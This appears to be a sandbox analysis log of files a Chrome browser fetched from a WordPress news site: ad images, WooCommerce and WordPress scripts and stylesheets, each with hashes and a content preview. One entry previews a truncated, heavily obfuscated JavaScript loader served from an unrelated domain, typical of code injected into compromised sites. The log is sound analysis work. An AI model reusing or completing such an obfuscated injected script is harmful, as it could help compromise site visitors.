                                                        Category:downloaded
                                                        Size (bytes):85643
                                                        Entropy (8bit):7.95535523162493
                                                        Encrypted:false
                                                        SSDEEP:1536:Y6i3hb0yW6nUtWSoyRLNmweJfVZDUANeiavObTvDV03FPHLri4+wJzGrhRM:Y9wy6doyRLNmdJtFTNUCvDV03J/EaIG
                                                        MD5:04E7BB2833064218B16B1A157E8E721C
                                                        SHA1:D17FF498EA299E92A038180C96E615CD7FE4DC4A
                                                        SHA-256:D38F38C9F9A568A0325D3ABC5B85B195A27E3A8DB53C1107BE430711D7688270
                                                        SHA-512:6C640ECAA81A03DD5E2C8D8D3657A33AD8354A2EB92CD833E806DFDFD569D27C4696DD6F9DB9560F5344A90FB2346112236DB4C71DAF02EB76ECB16740B3AF0D
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://adserver.paywallproject.com/wp-content/uploads/2024/12/PROCEEDS_300x250_GIF_FINAL_72dpi.gif
                                                        Preview:GIF89a,.............{.pp.......N8NWFk.k..s.PCO..,........ZW.e.....4.U.....{.........elX{..{....eZ.-+6..jyc....Lc..9@.......*)2V.^.".......&..n.x.V....lQreQ1...........T..O)dz.../.....oR.u....so.GJ......mQUmlp.Sl...............@A............zt.ON.7\p.....s.E.a.hc..QQRs.Rk...#...........#,B8a...+.,......n:b.iS.gM3Gz.hL.&.Ci.cd....|.....f0U..{..s...)..............\exw.#............&.n....~MR.Z_h......k..iv;.....[..............J.xw./4z...5#.`1..Hs.....`.k.....z..q.@.{....ht.}........Cs..\`.X.I.H..l.Z....{.h....gW.....{.w....U...uk.m...|..7.....#.Z\.! N..hp.j..<?-Zm71~...jwJ.....w.[...k.\_.Z.k.....{.....s.....................|............................|...........s~...............p...x.]...~...L\.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a1cd12f41, 2024/11/08-16:09:20 "> <rdf:RDF xmlns:rdf=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1690)
                                                        Category:downloaded
                                                        Size (bytes):1720
                                                        Entropy (8bit):5.267625476247862
                                                        Encrypted:false
                                                        SSDEEP:48:/1lhS9hksVo919Lvq5LJaSK7maUi9DYpc:/HhagNXD
                                                        MD5:691A1E43450E7CDA541A3BD6F10FD5DB
                                                        SHA1:D3A78CB77CCEC297C9D32FEE99A2A4761F604A8C
                                                        SHA-256:8B083F64F2E9E8AC445C730DFCE7013CC6449CE155FD1C2F42B60EDBA4ECB4B1
                                                        SHA-512:A32EBE942E704DA64381E392FFC20ED4F9D8DAF71227A06F2DC0CA5C037675AB67E5B5A5DDF9BCB77B1872308DAA780CC0E6EC5A2469BCD51444ECE4F3B3DE0D
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.9.7.1
                                                        Preview:/*! js-cookie v3.0.5 | MIT */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self,function(){var n=e.Cookies,o=e.Cookies=t();o.noConflict=function(){return e.Cookies=n,o}}())}(this,function(){"use strict";function e(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)e[o]=n[o]}return e}return function t(n,o){function r(t,r,i){if("undefined"!=typeof document){"number"==typeof(i=e({},o,i)).expires&&(i.expires=new Date(Date.now()+864e5*i.expires)),i.expires&&(i.expires=i.expires.toUTCString()),t=encodeURIComponent(t).replace(/%(2[346B]|5E|60|7C)/g,decodeURIComponent).replace(/[()]/g,escape);var c="";for(var u in i)i[u]&&(c+="; "+u,!0!==i[u]&&(c+="="+i[u].split(";")[0]));return document.cookie=t+"="+n.write(r,t)+c}}return Object.create({set:r,get:function(e){if("undefined"!=typeof document&&(!arguments.length||e)){for(var t=document.co
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 1 x 1
                                                        Category:dropped
                                                        Size (bytes):43
                                                        Entropy (8bit):2.9674235276304235
                                                        Encrypted:false
                                                        SSDEEP:3:CUPexltxlHh/:8b/
                                                        MD5:6F81C41597D3F5A336F458822CC0C32A
                                                        SHA1:8CD77A54B38F1FB376B45AF2EAAB8F5982523B8D
                                                        SHA-256:5704A2E9F2F7CE43A79F9B407F1AEDCFD50223CBE8BD2F71FF8C5C819E469CBC
                                                        SHA-512:EDB4841FA021F06B664C4F09378F6572177CEB8518B976C0B1571E2346FA116097D4979D31BD9AB7E841B68795922A07D451583620A2F31E3E54A867F91D7C95
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:GIF89a.............!.......,...........D..;
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 300 x 250, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):27136
                                                        Entropy (8bit):7.971326426582436
                                                        Encrypted:false
                                                        SSDEEP:768:qn2A7e5jHd8oa7bKVcqlc939d/Tnpj/YVBHdCWPFoyg:qn2oI0z9Nd/TnpjwVLpPy5
                                                        MD5:7A79130D67FE26FDDC4A21B04A69CD48
                                                        SHA1:EF83B817EEB4A7D84B255D707EEBED70CD3E3ECF
                                                        SHA-256:463BE76C3848386702C53AAC166ED208264FBD4015E8F58D38138AF79AD509F3
                                                        SHA-512:660B5B67F7CECE130FD4734AE8AA044CF9470A5C13545A767B432E5384FBF8A017810FBDE58C7ABCF5D1589197DA1200B3D9A4181EE68996997EB6661B9761F4
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...,..........mz.....pHYs..........+......iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2025-01-16</Attrib:Created>. <Attrib:ExtId>87f31700-94e0-44d8-a2c2-48c55e879a46</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Examiner (300 x 250 px) - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>. <pdf:Author>Rachel Stark</pdf:A
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 100 x 75
                                                        Category:dropped
                                                        Size (bytes):4399
                                                        Entropy (8bit):7.837306010522945
                                                        Encrypted:false
                                                        SSDEEP:96:pRdFes/VLSUNiDtox2dcRAhcRAjDtox28Y9QXa3X:DPP/gUxK7h7+xhXsX
                                                        MD5:C225D4001DC31C7FF8E290129F436175
                                                        SHA1:B27A1DCBF1ACCDEE9B64DB482E72AC3972363915
                                                        SHA-256:E2E60E9EAE839D6B2E857C708F6D02AE6069141594B941A1590CD5C5435D42F4
                                                        SHA-512:35BBD26A526ED0613FDA98415BBD0BAE1D7E3D76D74C3F85697BA7B371D08EC3ECC0D28D80FB2EEE88413DD051B52AD227617C1D78DCB0E877E4354705332E59
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:GIF89ad.K....................................................!..NETSCAPE2.0.....!.......,....d.K...l..I..8....'.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z..v..z..xL....z.n...|N.....~..................!s...!.......,......K...~...R,.I/V.AYW&L.....2[....qE...z....a.?...@2..f1.UU.....&.Kj.....g.sl._..v.-_..v7.....ub.}..z....s.....y..........he!..F...!.......,......K......D.... .9..(.cJX.m...d...Ei....9..\..0..3..{.Z"y...0(.f....R.i.%..... S.9.(F..q..h...:{l?e].rk%}.ya..w..z.Q.~...5......C.t.S.....7..........|....................................................................'...|...2.pa.z...cFo"7...A.nc1..A...hq..$.Q<.]."Qv|.Pa.7m...3f.*/...'N.:..U..$OlKp.1.D..,1"..!.......,....(.K........B(.3..E".....0l.fQ.RY..._h.(0..@.".Q..['g".z*....]2.%.Y.A.-..jM.~..{J..S#.).t<.....D.bTs45.~j]](~+p.r1HI..\{.}...rD.Ji.lnR....Lz$..Aq.... :...`...Yx..^....W...{.}...K.k...G......c.............a.....Q............^7.........k..-...!....1.f._...(.......=....Fw.Vb..RdC.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (37923), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):37931
                                                        Entropy (8bit):5.3052797962231075
                                                        Encrypted:false
                                                        SSDEEP:384:HW/4y+6Gn4LAfP1EgJU8XAiMEkhrcSyhoOn/xq5YZLC108ABItI4NmlioGxaZ/8G:2X+48tszJEJ/cmTatIGaAa+gFJB
                                                        MD5:9B265D4780B3DC89B04747162A883851
                                                        SHA1:3BD9CDCEE56EAD7EACC94BCFF379304C64534EE3
                                                        SHA-256:4BE59303A71DBA6E02707EFDAF510E858B5A703D09811680DBC3FADA6C2111C5
                                                        SHA-512:BEBB3D7592FEC4CFBF356BE9BDAEB72FE48507BF5C8220CEA7EFC6085F41D63586E65A4D517C3C607D2658C380EEA5A09DC6DDA811C76AF2C59F731A4AB2C433
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                                                        Preview:!function(r){"use strict";var t,e,n;t=[function(r,t,e){e(1),e(73),e(76),e(78),e(80),e(92),e(93),e(95),e(98),e(100),e(101),e(110),e(111),e(114),e(120),e(135),e(137),e(138),r.exports=e(139)},function(r,t,e){var n=e(2),o=e(67),a=e(11),i=e(68),c=Array;n({target:"Array",proto:!0},{toReversed:function(){return o(a(this),c)}}),i("toReversed")},function(t,e,n){var o=n(3),a=n(4).f,i=n(42),c=n(46),u=n(36),f=n(54),s=n(66);t.exports=function(t,e){var n,p,l,y,v,h=t.target,g=t.global,d=t.stat;if(n=g?o:d?o[h]||u(h,{}):o[h]&&o[h].prototype)for(p in e){if(y=e[p],l=t.dontCallGetSet?(v=a(n,p))&&v.value:n[p],!s(g?p:h+(d?".":"#")+p,t.forced)&&l!==r){if(typeof y==typeof l)continue;f(y,l)}(t.sham||l&&l.sham)&&i(y,"sham",!0),c(n,p,y,t)}}},function(r,t,e){var n=function(r){return r&&r.Math===Math&&r};r.exports=n("object"==typeof globalThis&&globalThis)||n("object"==typeof window&&window)||n("object"==typeof self&&self)||n("object"==typeof global&&global)||n("object"==typeof this&&this)||function(){return this}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):70
                                                        Entropy (8bit):4.479881418282092
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlE+tnMysyxt8KaZ1p:6v/lhPfZMysO8Zp
                                                        MD5:C0DDCC7CC2D334254808AE1D918F9EE7
                                                        SHA1:6EA24D025387CE247FA530F14778EF7ADA4683D5
                                                        SHA-256:67EBF650147A9122E94FF1B25A78A82E903B92B877821C1479DE69F00F59D429
                                                        SHA-512:73AF7C69EA68717A77638A0ACF15ADE570873FBA98FE1FC0FBD0C246B960AAC1E66406323E758CE7320DA6A11AB3487992E6CF5F160B96215FC278E6A288A138
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/themes/jnews/assets/img/jeg-empty.png
                                                        Preview:.PNG........IHDR....................IDAT..c...?........4....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (15315), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):15315
                                                        Entropy (8bit):5.214427660906503
                                                        Encrypted:false
                                                        SSDEEP:384:1wNWSiRVRS4tdanZkYH5FL736ePkPakFX:qNdi7anPH5FL736ePkP/
                                                        MD5:FC06080EBF979384EAF92A5F1CD7A50B
                                                        SHA1:1474B07026C758629A82DF51A5E4FBB7ABF531DF
                                                        SHA-256:C50A0B33030BA0EC063BE642C297F48AF94359E2222FF140817248D591FAF837
                                                        SHA-512:D6443028105566717F328C56D17A0694E13905AA008BD36BA744E76BC5181E854AB80563BE1D3167D728BF5EBA6C502D7E36AEBF0ED74504C88E47125CC710AA
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=aab4a5
                                                        Preview:!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{var t;"undefined"!=typeof window?t=window:"undefined"!=typeof global?t=global:"undefined"!=typeof self&&(t=self),t.sbjs=e()}}(function(){return function e(t,r,n){function a(s,o){if(!r[s]){if(!t[s]){var c="function"==typeof require&&require;if(!o&&c)return c(s,!0);if(i)return i(s,!0);var u=new Error("Cannot find module '"+s+"'");throw u.code="MODULE_NOT_FOUND",u}var p=r[s]={exports:{}};t[s][0].call(p.exports,function(e){var r=t[s][1][e];return a(r||e)},p,p.exports,e,t,r,n)}return r[s].exports}for(var i="function"==typeof require&&require,s=0;s<n.length;s++)a(n[s]);return a}({1:[function(e,t,r){"use strict";var n=e("./init"),a={init:function(e){this.get=n(e),e&&e.callback&&"function"==typeof e.callback&&e.callback(this.get)}};t.exports=a},{"./init":6}],2:[function(e,t,r){"use strict";var n=e("./terms"),a=e("./helpers/utils"),i={containers
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (30497), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):30497
                                                        Entropy (8bit):4.979035706513758
                                                        Encrypted:false
                                                        SSDEEP:768:ujBiWHgunXC96PUTjCWU6pV02ZyLVEV/dMdE43KOGKZi:GXq9PF5Hj
                                                        MD5:0A2919E2EEAD8D81C0546745B2BBE5D7
                                                        SHA1:01DB1C7CE456057D829885AF8F61D9B7783643E4
                                                        SHA-256:7612A22604ABA263F30E7DC067DAB8C9B030819438E19D2382A2F95CA6C7D34F
                                                        SHA-512:FEAC580EC8E790D6F293839438686BAA9E21782F44A68D116D5FA0809BA614972B49F6EF817D91FCE25530C5F473C282A60E8D3177BF05B892FBB8F2409BEA25
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://virtual.urban-orthodontics.com/SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY=
                                                        Preview:(function(_0x30896a,_0x11439a){var a0_0x4f49fa={_0x198556:0x5b6,_0x255c0e:0x571,_0x139ed0:'KjXS',_0x97aee4:0x5b1,_0x102b83:0x57a,_0x17c7aa:'1GOy',_0x3e0eb1:0x5c9,_0x1b7189:0x626,_0x268a36:0x64f,_0x2f6e0c:'lsfq',_0x1e02e1:0x5c6,_0xdd5e12:0x199,_0x259cf1:0x1d0,_0x20c0f5:0xd0,_0x37bde3:0x12d,_0x3d85e5:'^VR]',_0x23b88b:0x2a6,_0x598a3c:0x27b},a0_0x5ed011={_0x44a3b7:0x3ab},a0_0x3ec8e7={_0x305855:0x317};function _0x187a18(_0x2c1b16,_0x4f444b,_0x3fc835,_0x3f9db4,_0x5b93f6){return a0_0x591f(_0x3f9db4- -0x45,_0x2c1b16);}function _0x50d714(_0x404749,_0x2c08bb,_0x143df8,_0x4dac06,_0x231a4a){return a0_0x591f(_0x404749- -a0_0x3ec8e7._0x305855,_0x4dac06);}var _0x47a816=_0x30896a();function _0xc94b45(_0x4aeae7,_0x5a9e6f,_0x2e8596,_0x4bc141,_0x382d30){return a0_0x591f(_0x2e8596-a0_0x5ed011._0x44a3b7,_0x4bc141);}function _0x22849d(_0x457b62,_0x5f13ee,_0x2ad268,_0x53568f,_0x57d0d3){return a0_0x591f(_0x57d0d3-0x35e,_0x2ad268);}function _0x5791ff(_0x42b766,_0x1bc5dd,_0x3bb039,_0x485494,_0x33df8c){return a0
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (23022)
                                                        Category:downloaded
                                                        Size (bytes):23023
                                                        Entropy (8bit):4.767341302454025
                                                        Encrypted:false
                                                        SSDEEP:192:hiUaWVyyTSr3y8ywyXkX7PEj9uSTOVYjVY0cVY0cmN6HMx3TpIBqUr46mS3MjtNe:2HS2c06/B/zOe
                                                        MD5:2F1D63B5579AF7BBF13EF02F03EB207A
                                                        SHA1:778FA4295517D5F6B935F56DF83030A724349BBA
                                                        SHA-256:FDEBD00CC9FD88772C8C7F9E3638F96381684625915AA61653DC7D15675C06F5
                                                        SHA-512:40E59DCAB74CC8E6F4F35664EF53C68FA1A3E7DFE7293849135D5C15C7FF6D5F3DC21352A5178FEE4ECD2D2603CD2FD22D52A9F5AC6F4C8F303533BA4D00E25D
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/mailster/build/form/style-index.css?ver=0b25e1
                                                        Preview:html.mailster-form-active,html.mailster-form-active body{overflow:hidden}body.single-mailster-form #wpadminbar,body.single-mailster-form #wpadminbar *{_visibility:visible}body.single-mailster-form:after,body.single-mailster-form:before{display:none}body.single-mailster-form>*{display:none!important}body.single-mailster-form{background:none;overflow:hidden}body.single-mailster-form .mailster-block-form-type-content:not(.foo){align-items:center;inset:0;bottom:0;display:flex!important;height:100%!important;justify-items:center;left:0;margin:0!important;max-height:100%!important;max-width:100%!important;overflow:auto;position:fixed;right:0;top:0;visibility:visible;width:100%!important;z-index:99998}body.single-mailster-form .mailster-block-form-type-content:not(.foo) form{background-color:#fff}body.single-mailster-form .mailster-block-form-type-content *{visibility:visible}.mailster-block-form-type-bar,.mailster-block-form-type-popup,.mailster-block-form-type-side{display:none;inset:0;bott
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (7527), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):7527
                                                        Entropy (8bit):4.648147336771753
                                                        Encrypted:false
                                                        SSDEEP:192:mjHXN5HjRHJNnHKDHJXHasHyBj8nHBH8bNbHlUqrmni4ElJK6XKUlK5859lP5IQl:mTdtjVTHKzJXawyBEleb8apGAHNJ
                                                        MD5:59D266C0EA580AAE1113ACB3761F7AD5
                                                        SHA1:73C56509CEDA1B1047096BAE2CAB820063047833
                                                        SHA-256:8DE5B2AE100F00D7A4E18F42CB12E8B5562D387F6B5C0ED09332CD5CEC389AC0
                                                        SHA-512:E24E206F12B35D20BA6E84A63F4855BAEE00A47448E0E106BB6565DCA151D758388C65E0FEA651FBACBDA985EFAABFB86756A24EB343E1A1023B17CA20A4FED3
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=aab4a5
                                                        Preview::root{--woocommerce:#720eec;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#720eec;--wc-primary-text:#fcfbfe;--wc-secondary:#e9e6ed;--wc-secondary-text:#515151;--wc-highlight:#958e09;--wc-highligh-text:white;--wc-content-bg:#fff;--wc-subtext:#767676;--wc-form-border-color:rgba(32, 7, 7, 0.8);--wc-form-border-radius:4px;--wc-form-border-width:1px}.woocommerce table.shop_table_responsive thead,.woocommerce-page table.shop_table_responsive thead{display:none}.woocommerce table.shop_table_responsive tbody tr:first-child td:first-child,.woocommerce-page table.shop_table_responsive tbody tr:first-child td:first-child{border-top:0}.woocommerce table.shop_table_responsive tbody th,.woocommerce-page table.shop_table_responsive tbody th{display:none}.woocommerce table.shop_table_responsive tr,.woocommerce-page table.shop_table_responsive tr{display:block}.woocommerce table.shop_table_responsive tr td,.woocommerce-page table.shop_table_responsive tr td{display
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 300 x 250, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):27136
                                                        Entropy (8bit):7.971326426582436
                                                        Encrypted:false
                                                        SSDEEP:768:qn2A7e5jHd8oa7bKVcqlc939d/Tnpj/YVBHdCWPFoyg:qn2oI0z9Nd/TnpjwVLpPy5
                                                        MD5:7A79130D67FE26FDDC4A21B04A69CD48
                                                        SHA1:EF83B817EEB4A7D84B255D707EEBED70CD3E3ECF
                                                        SHA-256:463BE76C3848386702C53AAC166ED208264FBD4015E8F58D38138AF79AD509F3
                                                        SHA-512:660B5B67F7CECE130FD4734AE8AA044CF9470A5C13545A767B432E5384FBF8A017810FBDE58C7ABCF5D1589197DA1200B3D9A4181EE68996997EB6661B9761F4
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2025/02/Examiner-300-x-250-px-1.png
                                                        Preview:.PNG........IHDR...,..........mz.....pHYs..........+......iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2025-01-16</Attrib:Created>. <Attrib:ExtId>87f31700-94e0-44d8-a2c2-48c55e879a46</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Examiner (300 x 250 px) - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>. <pdf:Author>Rachel Stark</pdf:A
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1464)
                                                        Category:downloaded
                                                        Size (bytes):1499
                                                        Entropy (8bit):4.983141781132298
                                                        Encrypted:false
                                                        SSDEEP:24:Q77GSHLWBBB7c0pP30RddMUq2TXWtMr39tNsSlCtMyrjXsFXrTBF0Z005O6xcHT:Q7CSHLWrxccP30RA2Tmte9/TlCtdcFbp
                                                        MD5:8C0498E2F1F7A684A8D2A3FEB934B64B
                                                        SHA1:76099689CCAEE466D4608DA621C403B368DCAE03
                                                        SHA-256:ED5B5DF9CEACFE76857AC51964972B0B417A215B2F50E837FD6B64BAD7339C40
                                                        SHA-512:5689B6B18071D6020A8A2733BB9E17C07960D9E65F4012CE93F21347FA24A24175509BCA6920FE1B03D66FBC054D718671C23071AF115B64000C01DFBEA2E8DD
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2
                                                        Preview:/*! This file is auto-generated */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof module&&module.exports?module.exports=e(require("jquery")):jQuery&&!jQuery.fn.hoverIntent&&e(jQuery)}(function(f){"use strict";function u(e){return"function"==typeof e}var i,r,v={interval:100,sensitivity:6,timeout:0},s=0,a=function(e){i=e.pageX,r=e.pageY},p=function(e,t,n,o){if(Math.sqrt((n.pX-i)*(n.pX-i)+(n.pY-r)*(n.pY-r))<o.sensitivity)return t.off(n.event,a),delete n.timeoutId,n.isActive=!0,e.pageX=i,e.pageY=r,delete n.pX,delete n.pY,o.over.apply(t[0],[e]);n.pX=i,n.pY=r,n.timeoutId=setTimeout(function(){p(e,t,n,o)},o.interval)};f.fn.hoverIntent=function(e,t,n){function o(e){var u=f.extend({},e),r=f(this),v=((t=r.data("hoverIntent"))||r.data("hoverIntent",t={}),t[i]),t=(v||(t[i]=v={id:i}),v.timeoutId&&(v.timeoutId=clearTimeout(v.timeoutId)),v.event="mousemove.hoverIntent.hoverIntent"+i);"mouseenter"===e.type?v.isActive||(v.pX=u.pageX,v.pY=u.pageY,r.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (2005)
                                                        Category:downloaded
                                                        Size (bytes):30536
                                                        Entropy (8bit):5.296430992166618
                                                        Encrypted:false
                                                        SSDEEP:384:UjWFLLVR1slaCZDCP+YNDWXiNZORffvv+UPvEpUDNQM:qWFvVRalrZWP+YNDWXoZORffeBpURp
                                                        MD5:948C6418F36B8CB6AB425A3CE2109D02
                                                        SHA1:6EB4BE372EAE692AFA881038844910E6B3758F8E
                                                        SHA-256:F8B4A3C61EA5040B3CF8F079F03E9C65791C2D4320DA2A6E4A73068064256795
                                                        SHA-512:A4A9AE2757D13F926B0929E2F6C54C342893AC0EA5A71131553A299B0FD0BC165DAB7B41FDEA22C22DD206EE19BB8B87B5B1C0F6B5AF06F1BC652FBA37DF6966
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core.js?ver=56
                                                        Preview:var LRM = LRM ? LRM : {};..//jQuery(document).ready(function($) {.// jQuery(document).ready(./** @var $ jQuery */.+(function ($) {...if ( LRM.home_url_arr.scheme !== window.location.protocol.replace(":", "") ) {...alert( "AJAX Login and Registration Popup warning: the WP settings site URL scheme and current url scheme doesn't math. " + "\n\r" +.... "WP settings url: " + LRM.home_url + "\n" + "Browser url: " + window.location.href + "\n\r" +.... "This could cause a login/registration issues! " +.... "Usually this happens when SSL (HTTPS) were added to the site, but HTTP version still accessible. How to set up HTTP to HTTPS redirect: https://websitesetup.org/http-to-https-wordpress/" );..}...if ( LRM.validate_domain && LRM.home_url_arr.host !== window.location.host ) {...alert( "AJAX Login and Registration Popup warning: the WP settings site Domain and current url Domain doesn't math. " + "\n\r" +.... "WP settings domain: " + LRM.home_url_arr.host + "\n" + "Browser domain: " + window
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (510)
                                                        Category:downloaded
                                                        Size (bytes):2057
                                                        Entropy (8bit):4.877899442733922
                                                        Encrypted:false
                                                        SSDEEP:48:7xcQNi95wkFo1eoNpzqazRqjuRMcsdE9dPTioe0EXmx0Gd+95nB:7xhNi3w6o1eoN8oqjuRMcsS9dPTioe0o
                                                        MD5:77598D4073981B718543EB1C33685D53
                                                        SHA1:8B3AA062DE5B679EE66F152FC8BDADBD5AAE6FC1
                                                        SHA-256:B6A042658CDC6BD03C944EC3BD5529C58BF112AB92D1EB284D4AD4E2581EC869
                                                        SHA-512:B1ECB503D76B2DFBB79ADB3ABA9151653F529E4F0F2BF2EE5AA02FC0F9BC71A433240EA2FE4AF13566A1ED1DBD593F2A8826993AB2D8FBD59CF4886C8CC86EB5
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/skins/default/skin.css?ver=56
                                                        Preview:.lrm-inline .lrm-user-modal-container { border: 2px solid #d2d8d8; }...lrm-user-modal-container-inner {. border-radius: 0.25em;. overflow: hidden;.}.../* TABS */..lrm-user-modal-container { x-border-radius: 0.25em; }..lrm-user-modal-container .lrm-switcher a { background: #d2d8d8; color: #809191; }..lrm-user-modal-container .lrm-switcher.-is-not-login-only a.selected { background: #FFF; color: #505260; }..lrm-user-modal-container .lrm-switcher.-is-not-login-only li:first-child a { border-radius: 0.25em 0 0 0; }..lrm-user-modal-container .lrm-switcher.-is-not-login-only li:last-child a { border-radius: 0 0.25em 0 0; }..lrm-user-modal-container .lrm-switcher.-is-login-only li a { border-radius: 0.25em 0.25em 0 0; }...lrm-form input.has-border, .lrm-form select.has-border { border: 1px solid #d2d8d8; }...lrm-form a.button, .lrm-form button, .lrm-form button[type=submit], .lrm-form #buddypress input[type=submit], .lrm-form input[type=submit] { background: #2f889a; color: #FFF; }...lr
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):85777
                                                        Entropy (8bit):4.885925896220245
                                                        Encrypted:false
                                                        SSDEEP:768:uoJlcBI5wzYt3SRcmRQ6KmdbqmMk8iq4b/jOVxEVU7:umcy5wzYtYQ6/dbqmMk9y
                                                        MD5:7F07D0BE257D1039533077F60D396A85
                                                        SHA1:A7A69E267756E203D0823C0C6FF4DC4A9FC78B85
                                                        SHA-256:1267EA1372425D04F370E8DF9631E6C79C9D2977EE0DCF95FA499029DB739B9F
                                                        SHA-512:D5625E8831E8AFCD622785D664D32AD0B713FE2F1AC5985C212A5F695F044BFA08C9C799AAA1C47EABD89C837BED8BC1C9A0D5E8FD9A924BA5C9AD392FCB0BEE
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=aab4a5
